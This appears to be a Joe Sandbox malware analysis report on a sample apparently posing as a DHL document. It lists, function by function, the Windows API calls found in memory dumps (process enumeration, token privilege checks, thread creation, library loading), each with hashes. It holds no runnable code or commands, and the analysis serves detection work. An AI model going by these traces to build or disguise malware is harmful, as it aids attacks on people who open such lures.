                                                                                      • String ID:
                                                                                      • API String ID: 2759813231-0
                                                                                      • Opcode ID: 7a3055643f9844cd7a34955ef8d91053dfa2fd7604b76872cf3f4a97cc393639
                                                                                      • Instruction ID: d140798a548adf1ef353b947a100c07da24e23c7c0af24b268e0554b9248a128
                                                                                      • Opcode Fuzzy Hash: 7a3055643f9844cd7a34955ef8d91053dfa2fd7604b76872cf3f4a97cc393639
                                                                                      • Instruction Fuzzy Hash: B9313071D00149AFC700DFA9C885CAEBBF9EF89304B5480AAE415E7251D631DE45CBA0
                                                                                      APIs
                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00E0D501
                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00E0D50F
                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00E0D52F
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E0D5DC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                      • String ID:
                                                                                      • API String ID: 420147892-0
                                                                                      • Opcode ID: 4b3c3bfa103a8afd5552ed5da31ab703bfc58e7ae048c6495ca481b9f898ba65
                                                                                      • Instruction ID: 2d7ed03e4ddf357ca05d561f7041302031214700b0ef41ced37bda32fe19c761
                                                                                      • Opcode Fuzzy Hash: 4b3c3bfa103a8afd5552ed5da31ab703bfc58e7ae048c6495ca481b9f898ba65
                                                                                      • Instruction Fuzzy Hash: 633170711082009FD300EF64CC95AAFBBF8EF9A354F14052DF581A61A1EB71D989CBA2
                                                                                      APIs
                                                                                        • Part of subcall function 00DB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00DB9BB2
                                                                                      • GetCursorPos.USER32(?), ref: 00E39001
                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00DF7711,?,?,?,?,?), ref: 00E39016
                                                                                      • GetCursorPos.USER32(?), ref: 00E3905E
                                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00DF7711,?,?,?), ref: 00E39094
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2864067406-0
                                                                                      • Opcode ID: b34b3d930ce0f35a7b01bdd699cb0e7353847b0ee1ea3a1d47736a7ca792eb71
                                                                                      • Instruction ID: 20e67bbca033557fca52328603a72be18e25dbf26f801b849be65f0b7fc311d0
                                                                                      • Opcode Fuzzy Hash: b34b3d930ce0f35a7b01bdd699cb0e7353847b0ee1ea3a1d47736a7ca792eb71
                                                                                      • Instruction Fuzzy Hash: D721BF35600218FFDB298F99C85CEFA7FB9EB89350F104055F905672A2C3B59990DF60
                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNEL32(?,00E3CB68), ref: 00E0D2FB
                                                                                      • GetLastError.KERNEL32 ref: 00E0D30A
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E0D319
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00E3CB68), ref: 00E0D376
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                      • String ID:
                                                                                      • API String ID: 2267087916-0
                                                                                      • Opcode ID: 9a36f0f2103d63d61c54350df92006cf643fbfd50b3eab037e4f72bb85128a82
                                                                                      • Instruction ID: 2a4fe763f1adc48c67229b1c51cf8e14e082cf94f3d74683894b8965635acdca
                                                                                      • Opcode Fuzzy Hash: 9a36f0f2103d63d61c54350df92006cf643fbfd50b3eab037e4f72bb85128a82
                                                                                      • Instruction Fuzzy Hash: 08217E705083019FC700DF68C8854AABBE4EF56768F205A19F499E32E1D734D98ACBA3
                                                                                      APIs
                                                                                        • Part of subcall function 00E01014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E0102A
                                                                                        • Part of subcall function 00E01014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E01036
                                                                                        • Part of subcall function 00E01014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E01045
                                                                                        • Part of subcall function 00E01014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E0104C
                                                                                        • Part of subcall function 00E01014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E01062
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00E015BE
                                                                                      • _memcmp.LIBVCRUNTIME ref: 00E015E1
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E01617
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00E0161E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 1592001646-0
                                                                                      • Opcode ID: 7fa4cb380dd663cd7eea346b0dd3c8489f3e3a08b63a8f112d42d955c4b9b7bb
                                                                                      • Instruction ID: c3b9a637ea2562fc1722c72794374b139dc97db9c073cb53b6045dbe53114942
                                                                                      • Opcode Fuzzy Hash: 7fa4cb380dd663cd7eea346b0dd3c8489f3e3a08b63a8f112d42d955c4b9b7bb
                                                                                      • Instruction Fuzzy Hash: 68217A31E00109AFDB14DFA4DD49BEEB7B8EF44348F184499E441BB281E731AA85DBA0
                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00E3280A
                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E32824
                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E32832
                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00E32840
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Long$AttributesLayered
                                                                                      • String ID:
                                                                                      • API String ID: 2169480361-0
                                                                                      • Opcode ID: f82e1be613ddd38fd6c618994dc8703317ccbe5ded870f4dbbf362104592cf70
                                                                                      • Instruction ID: 30dbdf21cb49324033234d240c7599a4b1798d560d07b398cb733e471c69a5fc
                                                                                      • Opcode Fuzzy Hash: f82e1be613ddd38fd6c618994dc8703317ccbe5ded870f4dbbf362104592cf70
                                                                                      • Instruction Fuzzy Hash: 4821F131604110AFD7149B24C848FAA7F95EF85324F24815DF566AB2E2C771FC42C7A0
                                                                                      APIs
                                                                                        • Part of subcall function 00E08D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00E0790A,?,000000FF,?,00E08754,00000000,?,0000001C,?,?), ref: 00E08D8C
                                                                                        • Part of subcall function 00E08D7D: lstrcpyW.KERNEL32(00000000,?,?,00E0790A,?,000000FF,?,00E08754,00000000,?,0000001C,?,?,00000000), ref: 00E08DB2
                                                                                        • Part of subcall function 00E08D7D: lstrcmpiW.KERNEL32(00000000,?,00E0790A,?,000000FF,?,00E08754,00000000,?,0000001C,?,?), ref: 00E08DE3
                                                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00E08754,00000000,?,0000001C,?,?,00000000), ref: 00E07923
                                                                                      • lstrcpyW.KERNEL32(00000000,?,?,00E08754,00000000,?,0000001C,?,?,00000000), ref: 00E07949
                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00E08754,00000000,?,0000001C,?,?,00000000), ref: 00E07984
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                      • String ID: cdecl
                                                                                      • API String ID: 4031866154-3896280584
                                                                                      • Opcode ID: e1c6f4a148a5ada6b9bb91a4e666cf72d48851b345d9c2d1975b04e3bc7d91c3
                                                                                      • Instruction ID: a422009ecfb358af8926a54ef6d3e2a907a7990b09892a7f03295a472a81f435
                                                                                      • Opcode Fuzzy Hash: e1c6f4a148a5ada6b9bb91a4e666cf72d48851b345d9c2d1975b04e3bc7d91c3
                                                                                      • Instruction Fuzzy Hash: 8711263A200302AFCB159F39DC45D7A77E9FF85394B50502AF982D72A4EB31E851D7A1
                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E37D0B
                                                                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00E37D2A
                                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00E37D42
                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00E1B7AD,00000000), ref: 00E37D6B
                                                                                        • Part of subcall function 00DB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00DB9BB2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Long
                                                                                      • String ID:
                                                                                      • API String ID: 847901565-0
                                                                                      • Opcode ID: 87ef612f9efd9a18b18be307bfb052664d33a59847823be8e6e8f09228562873
                                                                                      • Instruction ID: f35119618bbf367a6cd589af97f3f6de235445864c8633ca1403b5b867b6efc3
                                                                                      • Opcode Fuzzy Hash: 87ef612f9efd9a18b18be307bfb052664d33a59847823be8e6e8f09228562873
                                                                                      • Instruction Fuzzy Hash: 8311DF72204658AFCB208F29CC08AA63FA4AF86364F619324F979F72F0D731C951DB50
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 00E356BB
                                                                                      • _wcslen.LIBCMT ref: 00E356CD
                                                                                      • _wcslen.LIBCMT ref: 00E356D8
                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E35816
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 455545452-0
                                                                                      • Opcode ID: fad4db8c03fabb168fd488fbdc464556b6d6d08d4b78787d7dd98afc9077e368
                                                                                      • Instruction ID: 7238f918924abbb5bc3e819d9fac5d951165b512f2ebe614c6ceaf419921d813
                                                                                      • Opcode Fuzzy Hash: fad4db8c03fabb168fd488fbdc464556b6d6d08d4b78787d7dd98afc9077e368
                                                                                      • Instruction Fuzzy Hash: D711067260061896DB20DF65CC89AFE3FACEF01764F10506AF916F6281EB70CA84CF61
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00E01A47
                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E01A59
                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E01A6F
                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E01A8A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: 0dbf221e9f943609986b356497a295565a4b8a5b1e2e9d74e0f34a53f777efdd
                                                                                      • Instruction ID: d1c641b805278a0215c4ce830d7efb789f5c77efa5e65f845472e8a41fcd6297
                                                                                      • Opcode Fuzzy Hash: 0dbf221e9f943609986b356497a295565a4b8a5b1e2e9d74e0f34a53f777efdd
                                                                                      • Instruction Fuzzy Hash: DF11FA3AA01219FFEB119BA5CD85FADBB78EB04754F200091E604B7290D6716E50DB94
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00E0E1FD
                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00E0E230
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E0E246
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E0E24D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                      • String ID:
                                                                                      • API String ID: 2880819207-0
                                                                                      • Opcode ID: 7d5a65e4ca6009ab1024005917ffa48905ee5b741bd749943a44fe8510e62e5e
                                                                                      • Instruction ID: 611a4ff86c4babe2ce66de9925e7e93dde851cba3cbc8add3e4f64eb5cb36dc0
                                                                                      • Opcode Fuzzy Hash: 7d5a65e4ca6009ab1024005917ffa48905ee5b741bd749943a44fe8510e62e5e
                                                                                      • Instruction Fuzzy Hash: E011E572904318BFC701DBA9AC09A9A7FAC9B45314F1146A9F814F3391D270C94887A0
                                                                                      APIs
                                                                                      • CreateThread.KERNEL32(00000000,?,00DCCFF9,00000000,00000004,00000000), ref: 00DCD218
                                                                                      • GetLastError.KERNEL32 ref: 00DCD224
                                                                                      • __dosmaperr.LIBCMT ref: 00DCD22B
                                                                                      • ResumeThread.KERNEL32(00000000), ref: 00DCD249
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                      • String ID:
                                                                                      • API String ID: 173952441-0
                                                                                      • Opcode ID: e767b97bd15239a73e6190a7279d01c08e6f0699455d779bad26fedd02da584f
                                                                                      • Instruction ID: 9874d9f1bc8c8aacba3343ab7bb4c2a9734a2ccb687c61de9c1e6381fd5187bb
                                                                                      • Opcode Fuzzy Hash: e767b97bd15239a73e6190a7279d01c08e6f0699455d779bad26fedd02da584f
                                                                                      • Instruction Fuzzy Hash: C501D67640520A7FC7115BA5DC09FAABA6EDF81730F24022DF925A71D0CB70C905D7B0
                                                                                      APIs
                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00DA604C
                                                                                      • GetStockObject.GDI32(00000011), ref: 00DA6060
                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00DA606A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3970641297-0
                                                                                      • Opcode ID: 56b86abc938ae293d22091c936f632dc49141e5d62cc730683d83a906b4f783d
                                                                                      • Instruction ID: 42a99eb6678b1878b65f9fc673dd060126b25170492fbf00ec9464ae2d9442af
                                                                                      • Opcode Fuzzy Hash: 56b86abc938ae293d22091c936f632dc49141e5d62cc730683d83a906b4f783d
                                                                                      • Instruction Fuzzy Hash: 2611A172101508FFEF124FA59C44EEA7F69EF09354F180106FA1462010C732DCA0DBA0
                                                                                      APIs
                                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00DC3B56
                                                                                        • Part of subcall function 00DC3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00DC3AD2
                                                                                        • Part of subcall function 00DC3AA3: ___AdjustPointer.LIBCMT ref: 00DC3AED
                                                                                      • _UnwindNestedFrames.LIBCMT ref: 00DC3B6B
                                                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00DC3B7C
                                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 00DC3BA4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                      • String ID:
                                                                                      • API String ID: 737400349-0
                                                                                      • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                      • Instruction ID: 826a2a38832371434e43d63f92d28643513e5eaaab500a9b114ea54061717a8e
                                                                                      • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                      • Instruction Fuzzy Hash: FD01D73210014ABBDF125E95CC46EEB7B6EEF58754F048018FE4897121C632E961ABB0
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00DA13C6,00000000,00000000,?,00DD301A,00DA13C6,00000000,00000000,00000000,?,00DD328B,00000006,FlsSetValue), ref: 00DD30A5
                                                                                      • GetLastError.KERNEL32(?,00DD301A,00DA13C6,00000000,00000000,00000000,?,00DD328B,00000006,FlsSetValue,00E42290,FlsSetValue,00000000,00000364,?,00DD2E46), ref: 00DD30B1
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00DD301A,00DA13C6,00000000,00000000,00000000,?,00DD328B,00000006,FlsSetValue,00E42290,FlsSetValue,00000000), ref: 00DD30BF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 3177248105-0
                                                                                      • Opcode ID: 793afb764485d0b8e301b52f606295ab3143506bd418eb4e441c9d227d5602eb
                                                                                      • Instruction ID: f066753e8fadfbb10447ae0b981c5788df873859dafb67621d783cc4294d56b1
                                                                                      • Opcode Fuzzy Hash: 793afb764485d0b8e301b52f606295ab3143506bd418eb4e441c9d227d5602eb
                                                                                      • Instruction Fuzzy Hash: 49012B32301626AFCB314FBAAC48A777B98AF05BA1B280621F905F3390C721D945C7F1
                                                                                      APIs
                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00E0747F
                                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00E07497
                                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00E074AC
                                                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00E074CA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
